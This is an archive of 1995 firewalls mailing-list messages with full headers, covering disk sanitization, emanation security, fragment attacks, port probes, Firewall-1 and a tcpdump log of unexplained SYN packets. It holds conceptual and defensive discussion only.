uvs1.orl.mmc.com(141.240.192.10) by miles via smap (V1.3) id sma022624; Sat Aug 5 14:02:40 1995 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA00383; Sat, 5 Aug 95 16:54:00 -0400 Date: Sat, 5 Aug 95 16:53:59 -0400 Message-Id: <9508052054.AA00383@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: ...It's Barnacle Bill the sailor. Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Subj: Re[2]: Someone knocking at our door... -Reply Phillip rote: >I agree. I am concerned that a smart cracker would not try >everything in the book at each site he goes to. He would instead try >one thing, and if that didn't work move on. True that could be the mark of the generic haquer drifting aimlessly from site to site, but would not happen if the intruder were either professional or dedicated. For instance an attack on Toxic Waste R Us would not begin electronically: it would most likely start with a job interview, someone hiring in as a temp, someone taking a job with the computer maintenance outsourcer, or even as a janitor. That way, when the first electronic probe starts, knowlege of just how to go about it will already be there. Of course, if all you are worried about are kids... (Sorry, been a rough day) Warmly, Padgett From firewalls-owner Sat Aug 5 14:55:28 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA22815 for firewalls-outgoing; Sat, 5 Aug 1995 14:21:38 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA22799 for ; Sat, 5 Aug 1995 14:21:35 -0700 Received: from uvs1.orl.mmc.com(141.240.192.10) by miles via smap (V1.3) id sma022788; Sat Aug 5 14:20:56 1995 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA00407; Sat, 5 Aug 95 17:05:58 -0400 Date: Sat, 5 Aug 95 17:05:58 -0400 Message-Id: <9508052105.AA00407@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: ANFSCD Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sick Puppy rites: >My dad, who is a history buff and still supports the Military - bless his >stoopid heart, says that back in the sixties some military cryptography >equipment leaked clear text on van Eck radiation bands so strongly that >the places the machines were installed in had to have special shielding. Red/Black says it all. In the sixties *everything* radiated (the relays in real TTYs were particularly loud) and that is why we have Faraday Cages and certain buildings are copper clad. Is really not a very interesting subject (inverse square gets you in the end) and if you doubt my capability to say that either ask Winn or look in the IW index 8*). Of course, in my wordview you do not try to hide, you swamp (amazing what you can do with an HP 8601A and a linear). And now back to firewalls & other perimeter defenses. Warmly, Padgett From firewalls-owner Sat Aug 5 16:02:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA25511 for firewalls-outgoing; Sat, 5 Aug 1995 15:33:30 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA25493 for ; Sat, 5 Aug 1995 15:33:27 -0700 From: mjr@iwi.com Received: from uvs1.orl.mmc.com(141.240.192.10) by miles via smap (V1.3) id sma025487; Sat Aug 5 15:33:08 1995 Received: from UVS1.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA00552; Sat, 5 Aug 95 18:31:57 -0400 Date: Sat, 5 Aug 95 18:31:56 -0400 Message-Id: <9508052231.AA00552@uvs1.orl.mmc.com> To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) Cc: "firewalls@greatcircle.com"@uvs1.dnet.mmc.com Subject: Re: ANFSCD Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A. Padgett Peterson, P.E. Information Security writes: >Red/Black says it all. In the sixties *everything* radiated (the relays in >real TTYs were particularly loud) and that is why we have Faraday Cages and >certain buildings are copper clad. A good reference for this sort of thing is Peter Wright's "Spy catcher" (which is an interesting book in general if you want a jandiced view of the entire spook mind-set). Wright describes some of the fun various folks had trying to read internal video monitors from across the street, etc. This was all in the '60s. The whole "Information Warfare" notion has gotten massively overhyped. It's just a zangy new buzz word for military intelligence as usual. It sure sounds sexy, though. :) Nowadays it's offensive information warfare to give the folks at Radio Shack the wrong address when you buy something, and it's defensive information warfare to have an unlisted phone number. :) mjr. From firewalls-owner Sun Aug 6 01:30:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA08601 for firewalls-outgoing; Sun, 6 Aug 1995 01:08:17 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA08593 for ; Sun, 6 Aug 1995 01:08:15 -0700 Message-Id: <199508060808.BAA08593@miles.greatcircle.com> Received: from cheops.anu.edu.au(150.203.76.24) by miles via smap (V1.3) id sma008591; Sun Aug 6 01:07:39 1995 Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA230476325; Sun, 6 Aug 1995 18:05:25 +1000 From: Darren Reed Subject: Re: established keyword vs. firewall-1 again To: mischler@Cubic.COM (Dave Mischler) Date: Sun, 6 Aug 1995 18:05:25 +1000 (EST) Cc: mulligan@incog.com, firewalls@greatcircle.com In-Reply-To: <199507281433.KAA09434@norman.li.Cubic.COM> from "Dave Mischler" at Jul 28, 95 10:33:55 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1100 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Dave Mischler, sie said: > > > This isn't quite true. Unless the product implments some type of frag > > cache and only pass fragment trailers matching a passed fragment header, > > it's still possible to use the fragment overlay attack. > > You're absolutely right. I have to point out though, that any product > that translates IP addresses and/or port numbers must either reassemble > fragments or maintain a fragment cache or the fragments can't be delivered > to the correct internal address and port. I've given this some thought, and it isn't quite correct. Translating port numbers is best solved using a proxy (circuit relay). However, the case for IP#s is different. The packet (and all its fragments) are uniquely identified within a given time span by (source ip, destination ip, id#). It should not be necessary to maintain a fragment cache for translating IP#s. But it any case, it doesn't matter whether there is a cache or not, if the reassembly routine is wrong, a fragment can overwrite previous data and invalidate it (and your filter results). darren From firewalls-owner Sun Aug 6 12:14:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA15406 for firewalls-outgoing; Sun, 6 Aug 1995 11:56:33 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA15111 for ; Sun, 6 Aug 1995 11:55:49 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id smas12397; Sun Aug 6 11:53:30 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id HAA09373; Sun, 6 Aug 1995 07:16:43 -0700 Received: from odo.acdnj.itt.com(151.190.1.25) by mycroft via smap (V1.3mjr) id sma009371; Sun Aug 6 07:16:32 1995 Date: Sun, 6 Aug 1995 10:11:49 -0400 Message-Id: <95080610114908@odo.acdnj.itt.com> From: nabadm@odo.acdnj.itt.com (set chaos/total) To: firewalls@greatcircle.com Subject: Re: Sanitizing SCSI disks X-VMS-To: SMTP%"firewalls@GreatCircle.COM" X-VMS-Cc: NABADM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Use Norton Wipedisk. Overwrite three times... that'll clear the media enough > so that it can be deamed "unclassified." However, it *STILL* must remain in > the DOD inventory for two years being *USED* in an unclassified mode before > it can be released to the public. (The destruction certificate must also > remain with the computer for two years.) > This is approved up to and including TS. That may have been true under the ISM, but the ISM has now been superseded by the NISPOM. According to the NISPOM "Clearing and Sanitization Matrix", pages 8-3-5 and 8-3-6, it is no longer possible to sanitize TS. All TS material must be destroyed. (NISPOM stands for "National Industrial Security Program Operating Manual". ISM stands for "Industrial Security Manual".) ------------------------------------------------------------------------------- "Crisis over, back to panic mode!" ------------------------------------------------------------------------------- N.A. Bogart nabadm@odo.acdnj.itt.com OpenVMS & Security Systems Manager bogart@itt.com ITT Avionics (201) 284-5117 VOICE(MAIL) 100 Kingsland Road (201) 284-3947 FAX Clifton NJ 07014 (201) 730-2681 PAGER ------------------------------------------------------------------------------- From firewalls-owner Sun Aug 6 12:16:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA16292 for firewalls-outgoing; Sun, 6 Aug 1995 12:00:15 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA14469 for ; Sun, 6 Aug 1995 11:53:33 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id smaua2397; Sun Aug 6 11:51:53 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id HAA09431; Sun, 6 Aug 1995 07:34:54 -0700 Received: from odo.acdnj.itt.com(151.190.1.25) by mycroft via smap (V1.3mjr) id sma009415; Sun Aug 6 07:34:12 1995 Date: Sun, 6 Aug 1995 10:35:44 -0400 Message-Id: <95080610354409@odo.acdnj.itt.com> From: nabadm@odo.acdnj.itt.com (set chaos/total) To: firewalls@greatcircle.com Subject: Re: InfoSec policies made easy? X-VMS-To: SMTP%"firewalls@greatcircle.com" X-VMS-Cc: NABADM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > The price is (or at least *was*) US$495. If the general feeling is a > positive one, I'll post The Gory Commercial Details. :P Consider this a positive response! ------------------------------------------------------------------------------- "Crisis over, back to panic mode!" ------------------------------------------------------------------------------- N.A. Bogart nabadm@odo.acdnj.itt.com OpenVMS & Security Systems Manager bogart@itt.com ITT Avionics (201) 284-5117 VOICE(MAIL) 100 Kingsland Road (201) 284-3947 FAX Clifton NJ 07014 (201) 730-2681 PAGER ------------------------------------------------------------------------------- From firewalls-owner Sun Aug 6 12:30:00 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA16695 for firewalls-outgoing; Sun, 6 Aug 1995 12:03:32 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA15430 for ; Sun, 6 Aug 1995 11:56:37 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id smaqc2397; Sun Aug 6 11:55:00 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id FAA08595; Sun, 6 Aug 1995 05:52:15 -0700 Received: from unknown(142.77.70.2) by mycroft via smap (V1.3mjr) id sma008593; Sun Aug 6 05:52:09 1995 Received: from waynes-crypt.net5b.io.org (waynes-crypt.net5b.io.org [199.166.191.172]) by io.org (8.6.12/8.6.12) with SMTP id IAA09526; Sun, 6 Aug 1995 08:53:39 -0400 Date: Sun, 6 Aug 1995 08:53:39 -0400 Message-Id: <199508061253.IAA09526@io.org> X-Sender: wayneg@io.org X-Mailer: Windows Eudora Version 1.4.3 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: paul@turbosoft.com.au From: wayne@keyman.Sygma.NET (Wayne Godbehere) Subject: Re: TCP port 709 - any details? Cc: Firewalls@GreatCircle.com, tech@keyman.Sygma.NET, security@keyman.Sygma.NET, customer_service@keyman.Sygma.NET Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Paul, you recently queried: >We've recently been probed - first ICMP >echos to all possible IP numbers to see what was active, then a >day later two machines were probed via TCP. Along with the >normal ports probed, an attempt was made to connect to TCP port 709. >Sure enough, our inetd is listening to 709. RFC 1700 lists this port >as 'entrustmanager' - does anyone have any further details on what >this port does/can be (mis)used for? (SunOS 4.1.1 if it matters). >I don't think anything was compromised, but I'd _really_ like to >find out what could have been done through this port. > >Any information gratefully received. > NorTel Secure Networks has a workstation-to-workstation desktop security product based on public-key encryption/MD5 hashing/digital signature which has a few server components. One of these is Entrust/Server another is Entrust/Manager and the final one is Entrust/X.500. The Entrust/Server has a daemon which listens for Entrust/Client traffic (tcp/+389) and then launches a process which establishes a reply channel with the client on a high numbered port (tcp/>+1024). If the nature of the Entrust/Client transactions requires actions from the Entrust/Manager process, then a secure session (using DES encryption) is established between the Entrust/Server and Entrust/Manager processes (which may reside on separate or the same physical machine). THIS TRAFFIC IS EXCLUSIVELY ON TCP/+709). There is no need for any external communication to port tcp/+709 unless you are running Entrust with Entrust/Manager and Entrust/Server on different sides of a firewall. You should block and log all attempts to access tcp/709 --- it should be assumed that this was truly an unfriendly probe! I hope this helps. By the way if you would like to get more information on Entrust please send me a request by e-mail at wayne@keyman.Sygma.NET. Wayne Godbehere wayneg@io.org Bell Sygma - Secure Services "Opinions expressed are my own and do no necessarily reflect those of my associates nor employers." From firewalls-owner Sun Aug 6 12:35:16 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA16588 for firewalls-outgoing; Sun, 6 Aug 1995 12:00:59 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA16489 for ; Sun, 6 Aug 1995 12:00:38 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id smaba2397; Sun Aug 6 11:58:53 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id CAA07123; Sun, 6 Aug 1995 02:54:36 -0700 Received: from quake.xnet.com(198.147.221.34) by mycroft via smap (V1.3mjr) id sma007121; Sun Aug 6 02:53:57 1995 Received: from davesbbs.UUCP by quake.xnet.com (8.6.11/XNet-1.2R) with UUCP id EAA04644 for firewalls@greatcircle.com; Sun, 6 Aug 1995 04:57:20 -0500 Received: by davesbbs.com; Sat, 05 Aug 1995 20:55:47 Message-ID: <1270@davesbbs.com> Reply-To: majordom@davesbbs.com (Majordomo) To: firewalls@greatcircle.com Date: Sat, 05 Aug 1995 20:55:47 Subject: Majordomo results: unsubscribe firewalls dave@davesbbs.com From: majordom@davesbbs.com (Majordomo) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From Majordomo-Owner@GreatCircle.COM Sat Aug 5 06:29:00 1995 Received: from relay1.UU.NET by quake.xnet.com (8.6.11/XNet-1.2R) with ESMTP id GAA07979 for ; Sat, 5 Aug 1995 06:29:00 -0500 Received: from miles.greatcircle.com by relay1.UU.NET with ESMTP id QQzblt07041; Sat, 5 Aug 1995 07:28:56 -0400 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA10699; Sat, 5 Aug 1995 04:08:00 -0700 Date: Sat, 5 Aug 1995 04:08:00 -0700 Message-Id: <199508051108.EAA10699@miles.greatcircle.com> To: dave@davesbbs.com From: Majordomo@GreatCircle.COM Subject: Majordomo results: unsubscribe firewalls dave@davesbbs.com Reply-To: Majordomo@GreatCircle.COM -- >>>> unsubscribe firewalls dave@davesbbs.com **** unsubscribe: 'dave@davesbbs.com' is not a member of list 'firewalls'. >>>> unsubscribe firewalls davesbbs.com **** unsubscribe: 'davesbbs.com' is not a member of list 'firewalls'. >>>> >>>> This has been an D A V E ' S P L A C E VirtualNET @1334607 **** Command 'this' not recognized. >>>> OFFICIAL EMAIL (334) 213-0554 24 hours FidoNET 1:375/201 **** Command 'official' not recognized. >>>> written at... @davesbbs.com ACNET 244:300/1 **** Command 'written' not recognized. >>>> **** Help for Majordomo@GreatCircle.COM: This is Brent Chapman's "Majordomo" mailing list manager, version 1.93-Brent. In the description below items contained in []'s are optional. When providing the item, do not include the []'s around it. It understands the following commands: subscribe [
] Subscribe yourself (or
if specified) to the named . unsubscribe [
] Unsubscribe yourself (or
if specified) from the named . get Get a file related to . index Return an index of files you can "get" for . which [
] Find out which lists you (or
if specified) are on. who Find out who is on the named . info Retrieve the general introductory information for the named . lists Show the lists served by this Majordomo server. help Retrieve this message. end Stop processing commands (useful if your mailer adds a signature). Commands should be sent in the body of an email message to "Majordomo@GreatCircle.COM". Commands in the "Subject:" line NOT processed. If you have any questions or problems, please contact "Majordomo-Owner@GreatCircle.COM". *Forwarded by Dave From firewalls-owner Sun Aug 6 15:36:50 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA18978 for firewalls-outgoing; Sun, 6 Aug 1995 15:13:52 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA18928 for ; Sun, 6 Aug 1995 15:13:46 -0700 Received: from psyche.the-wire.com(198.53.192.2) by miles via smap (V1.3) id sma018913; Sun Aug 6 15:13:06 1995 Received: from anton.the-wire.com (anton.the-wire.com [198.53.192.186]) by psyche.the-wire.com (8.6.10/8.6.9) with SMTP id SAA17703 for ; Sun, 6 Aug 1995 18:09:49 -0400 Date: Sun, 6 Aug 1995 18:09:49 -0400 Message-Id: <199508062209.SAA17703@psyche.the-wire.com> X-Sender: anton@psyche.the-wire.com Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.COM From: anton@the-wire.com (Anton J Aylward) Subject: Re: InfoSec policies made easy? - YES!! X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk jcarrol@wellspring.us.dg.com says: >Thought this might be relevant, as this topic comes up from time to >time. Feel free to comment. Policies aren't my forte, so please >direct your responses to the list. > >I was cleaning up around my desk when I came across a promo entitled >"Information Security Policies Made Easy". Dang near forgot about >this. I'll forward noteworthy points for comment: > Policies are my forte, so here goes. Policies should always be the starting point. Even if they are only of the form "Everything is prohibited except that which is explicitly permitted." Policies are a statement of the organization is trying to achieve. Liek the old adage about lack of planning, policies, and documenting them, and getting management (or client) sign-of is essential. Cressons's book, which I won't call a bible, but its within arms reach as I type this, does releive you of an __awful__ lot of detail work in writing policies. You can go to a client with this and have better than 85% of the work addressed. Not done; not covered, just addressed. Think of it as a well fleshed out "boilerplate". More to the point, it is comprehensive. Too may sites I've been into bog down and exhast themselves in detail. The detail _is_ necessary. Its just that by the time they've done all the stuff on acess permissiotns and password againg - which us UNIX types just take for granted in a proper SVR4 ( poke at Jim and the default SVR4 from DG there ;-) ) they are worn out. They seem to think they've put all the effort they need to in, and stop. Sigh. Recently, a large brewery here in Toronto had a security problem. Someone came in and _stole_ some executive laptops. So much for dial-in passwords and Novell style security. Sadly, its a situation where you have to get it all right or it don't work at all. And that is why it has to be policy driven. Good book. Go Buy it. -- Anton J Aylward The Strahn and Strachan Group Inc Information Security Consultants Voice: (416) 494-8661 Fax: (416) 494-8803 From firewalls-owner Sun Aug 6 19:30:13 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA28995 for firewalls-outgoing; Sun, 6 Aug 1995 19:00:30 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA28932 for ; Sun, 6 Aug 1995 19:00:22 -0700 Received: from hardwired.momentum.com.au(203.2.238.132) by miles via smap (V1.3) id sma028843; Sun Aug 6 18:59:16 1995 Received: (from uucp@localhost) by hardwired.momentum.com.au (8.6.12/8.6.12) id JAA07805 for ; Mon, 7 Aug 1995 09:53:50 +0800 Received: from aristoi.momentum.com.au(203.2.238.138) by hardwired via smap (V1.3mjr) id sma007802; Mon Aug 7 09:53:39 1995 X-Sender: todd@hardwired.momentum.com.au Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 7 Aug 1995 09:57:31 +0800 To: Firewalls@GreatCircle.COM From: todd@momentum.com.au (Todd Hooper) Subject: Re: Firewall-1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Strata writes: >Am I missing something here, like a later release than 1.0.7c? Yes - the current version is 1.2.1. I understand Checkpoint shipped 1.2 some months ago. SunSoft announced it in July. Todd -- Todd Hooper Internet : todd@momentum.com.au Momentum Pty Ltd Phone : 09 483 2649 Western Australia Fax : 09 380 4371 From firewalls-owner Sun Aug 6 20:30:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA00746 for firewalls-outgoing; Sun, 6 Aug 1995 20:05:58 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA00698 for ; Sun, 6 Aug 1995 20:05:51 -0700 Received: from ha.org.hk(202.64.48.240) by miles via smap (V1.3) id sma000667; Sun Aug 6 20:04:56 1995 Received: (from pwtyeung@localhost) by ha.org.hk (8.6.12/8.6.6) id LAA40531; Mon, 7 Aug 1995 11:01:15 +0800 Date: Mon, 7 Aug 1995 11:01:14 +0800 (HKT) From: Patrick Yeung Subject: IP translation in Firewall-1 To: firewalls@greatcircle.com Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is there anybody know if the Firewall-1 (release 1.2.1) can do IP-translation. That means it can remap the internal networks' IPs to the Firewall's IP. Regards, Patrick Yeung From firewalls-owner Sun Aug 6 20:47:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA00771 for firewalls-outgoing; Sun, 6 Aug 1995 20:07:54 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA00755 for ; Sun, 6 Aug 1995 20:07:51 -0700 Received: from bass.com.my(161.142.248.42) by miles via smap (V1.3) id sma000749; Sun Aug 6 20:07:23 1995 Received: from bass.bass.com.my (gw.bass.com.my) by bass.com.my with SMTP id AA10421 (5.67a/IDA-1.5 for ); Mon, 7 Aug 1995 11:05:46 +0800 Received: by bass.bass.com.my (4.1/SMI-4.1) id AA01069; Mon, 7 Aug 95 11:03:31 MYT Date: Mon, 7 Aug 1995 11:00:30 +0800 (MYT) From: Tham Huei Hwan Subject: Re: IPWatcher To: Cameron_A_P@ceo.sbic.co.za Cc: firewalls@greatcircle.com In-Reply-To: <9508021235.AA00151@zork.sbic.co.za> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 2 Aug 1995 Cameron_A_P@ceo.sbic.co.za wrote: > Message: > I have come accross a package on Internet Called IPWatcher. This > package renders Firewalls and Smart Cards Useless in that it allows > the person using it to Hijack and take over an established connection. > > The URL to get more Info on this package is > http://nad.infostructure.com/watcher.html > > My Question and problem is how do you prevent this from happening. > Also are there other Hacker tools that can do this. > > -- > Andrew Cameron > Cameron_A_P@ceo.sbic.co.za > > Dear Mr.Andrew Cameron Could you please E-mail me the information from http://nad.infostructure.com/watcher.html, because on my site I only can do E-mail and not ftp Thank. E-mail: Tham.Huei.Hwan@bass.com.my From firewalls-owner Mon Aug 7 02:31:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA08925 for firewalls-outgoing; Mon, 7 Aug 1995 02:11:36 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA08917 for ; Mon, 7 Aug 1995 02:11:33 -0700 Received: from sioux.eel.ufl.edu(128.227.56.139) by miles via smap (V1.3) id sma008914; Mon Aug 7 02:11:16 1995 Received: from iriquois.eel.ufl.edu by sioux.eel.ufl.edu (1.37.109.16/4.09) id AA184816600; Mon, 7 Aug 1995 05:10:01 -0400 From: "Mahesh Ramachandran" Message-Id: <199508070910.AA184816600@sioux.eel.ufl.edu> Subject: Question: continuous stream of syn packets To: firewalls@greatcircle.com Date: Mon, 7 Aug 1995 05:10:00 -0400 (EDT) Cc: rr (Mahesh Ramachandran) Organization: Electrical Engineering, University of Florida ___ X-Phone: (904) 392-4568 X-Operating-System: HP-UX A.09.01 9000/715 ( . ) X-Url: http://www.eel.ufl.edu/~rr -"-"- X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 3067 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk hi, I've been seeing a continuous stream of TCP SYN packets coming to one of the hosts on TCP ports 3333 through 3338. There isn't and never was anything on those ports. could someone provide me a clue, why a remote host would continously be trying to access these ports. I've appended a sample tcpdump output below. thx -rr --------------------------------------------------------------------------- from tcpdump 'tcp[13] & 3 != 0' src ... 11:44:05.00 src-host.2641 > dst-host.3333: S 1943353091:1943353091(0) win 8192 11:44:05.00 src-host.2642 > dst-host.3334: S 1943491933:1943491933(0) win 8192 11:44:05.00 src-host.2643 > dst-host.3335: S 1943652296:1943652296(0) win 8192 11:44:05.00 src-host.2644 > dst-host.3336: S 1943834739:1943834739(0) win 8192 11:44:05.00 src-host.2645 > dst-host.3337: S 1943910593:1943910593(0) win 8192 11:44:06.00 src-host.2646 > dst-host.3338: S 1943978488:1943978488(0) win 8192 11:45:05.00 src-host.2653 > dst-host.3333: S 1959808612:1959808612(0) win 8192 11:45:05.00 src-host.2654 > dst-host.3334: S 1959885897:1959885897(0) win 8192 11:45:05.00 src-host.2655 > dst-host.3335: S 1960018804:1960018804(0) win 8192 11:45:05.00 src-host.2656 > dst-host.3336: S 1960340481:1960340481(0) win 8192 11:45:05.00 src-host.2657 > dst-host.3337: S 1960404666:1960404666(0) win 8192 11:45:05.00 src-host.2658 > dst-host.3338: S 1960568529:1960568529(0) win 8192 from tcpdump -v src ... 12:05:04.976100 src-host.2898 > dst-host.3333: S 2299783809:2299783809(0) win 8192 (ttl 50, id 50673) 12:05:05.074249 src-host.2899 > dst-host.3334: S 2299873647:2299873647(0) win 8192 (ttl 50, id 50676) 12:05:05.178567 src-host.2900 > dst-host.3335: S 2299954453:2299954453(0) win 8192 (ttl 50, id 50681) 12:05:05.282498 src-host.2901 > dst-host.3336: S 2300146817:2300146817(0) win 8192 (ttl 50, id 50683) 12:05:05.437370 src-host.2902 > dst-host.3337: S 2300409262:2300409262(0) win 8192 (ttl 50, id 50688) 12:05:05.616838 src-host.2903 > dst-host.3338: S 2300508683:2300508683(0) win 8192 (ttl 50, id 50690) ------------------------------------------------------------------------------ -- From firewalls-owner Mon Aug 7 04:00:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA11710 for firewalls-outgoing; Mon, 7 Aug 1995 03:58:22 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA11690 for ; Mon, 7 Aug 1995 03:58:18 -0700 Received: from myall.awadi.com.au(150.207.2.65) by miles via smap (V1.3) id sma011684; Mon Aug 7 03:57:52 1995 Received: from bunya.awadi ([150.207.1.63]) by awadi.com.AU (4.1/SMI-4.1) id AA17971; Mon, 7 Aug 95 20:23:22 CST Received: from mallee.awadi by bunya.awadi (5.x/SMI-SVR4) id AA13282; Mon, 7 Aug 1995 20:19:44 +0930 From: blymn@awadi.com.AU (Brett Lymn) Message-Id: <9508071049.AA13282@bunya.awadi> Subject: Re: Sanitizing SCSI disks To: firewalls@greatcircle.com Date: Mon, 7 Aug 1995 20:19:45 +0930 (CST) X-Mailer: ELM [version 2.4 PL2] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to Tucker, R., SrA, 28CS/SCSNS: > >A small postive or negative current gets sent to the disk through the heads, >charging the surface of the disk. Like ALL electrical currents, it flows in >a wave pattern (frequency). The overwrite also flows in the same wave >pattern, BUT NOT IN THE EXACT LOCATION AS THE ORIGINAL WAVE PATTEERN. >Approximately 40% of the waves match after the first overwrite, leaving >about 60% you could still bring back, provided you have the right software >(some cases hardware is also necessary...I'm not the REAL expert on this, >but I have seen how OSI does this.) I forget the actual algorythm on how >much gets erased at each pass, but I do remember on the chart that after the >first pass, approx. 60% could still be recovered, and it went all the way >down to after the 99th pass, approx. .06% could still be recovered. > Oops, nice theory but totally ignores the head positioning slop in the mechanics of the system. If you can rip the platters out and run them under a suitable setup then you can pick up the tracks out of the slop and get the data back. This why _very_ paranoid people (aka security officers) will not accept the overwriting of the hard disk - you cannot _prove_ that all the data has been overwritten. Sure they may relent and downgrade the classification of the hardware to a lower level but that box must still be secured to the highest level of the data that was stored on it. Well, that's the way it works here in Australia, I would imagine it is not too much different elsewhere. > >ANother thing you can do, if it's possible to separate your disk (the little >case with the platters) from the controller board (or anything else you >don't want zapped) is to run it through a degausser. Now on this one you'll >have to look up the length of time, Oehrsteds (sp?), and for what >coercivity, etc. as they change from HD to HD. > Bzzzt wrong - *if* you manage to degauss the sucker at all then you have just stuffed the hard disk totally. All the modern hard disks I have seen use voice coil head drives which implies that one of the platter surfaces is devoted to disk postitioning servo information. Ever wondered why disks have an odd number of recording surfaces? This is the reason why, the servo is on one of these surfaces. Degaussing the servo surface implies that the disk drive electronics will no longer know where the f*ck the head is which makes the disk useless. -- Brett Lymn, Computer Systems Administrator, AWA Defence Industries =============================================================================== "It's fifteen hundred miles to Ankh-Morpork" he said. "We've got three hundred and sixty three elephants, fifty carts of forage, the monsoon's about to break and we're wearing ... we're wearing ... sort of things, like glass, only dark... dark glass things on our eyes..." - Terry Pratchett "Moving Pictures". From firewalls-owner Mon Aug 7 05:04:56 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA14436 for firewalls-outgoing; Mon, 7 Aug 1995 04:56:37 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA14420 for ; Mon, 7 Aug 1995 04:56:34 -0700 Received: from cbisgate.cbis.com(155.90.248.205) by miles via smap (V1.3) id sma014416; Mon Aug 7 04:55:49 1995 Received: from notes (notes.cbis.com) by cbisgate.cbis.com (4.1/SMI-4.1) id AA29182; Mon, 7 Aug 95 07:54:36 EDT Received: by notes (IBM OS/2 SENDMAIL VERSION 1.3.2)/1.0) id AA0216; Mon, 07 Aug 95 07:56:06 -0700 Message-Id: <9508071456.AA0216@notes> Received: from CBIS with "Lotus Notes Mail Gateway for SMTP" id 4C46F2B85EBABDDF852562110040F270; Mon, 7 Aug 95 07:56:05 To: firewalls-digest From: Warren Moore Date: 7 Aug 95 7:51:49 EDT Subject: Re: NCSA 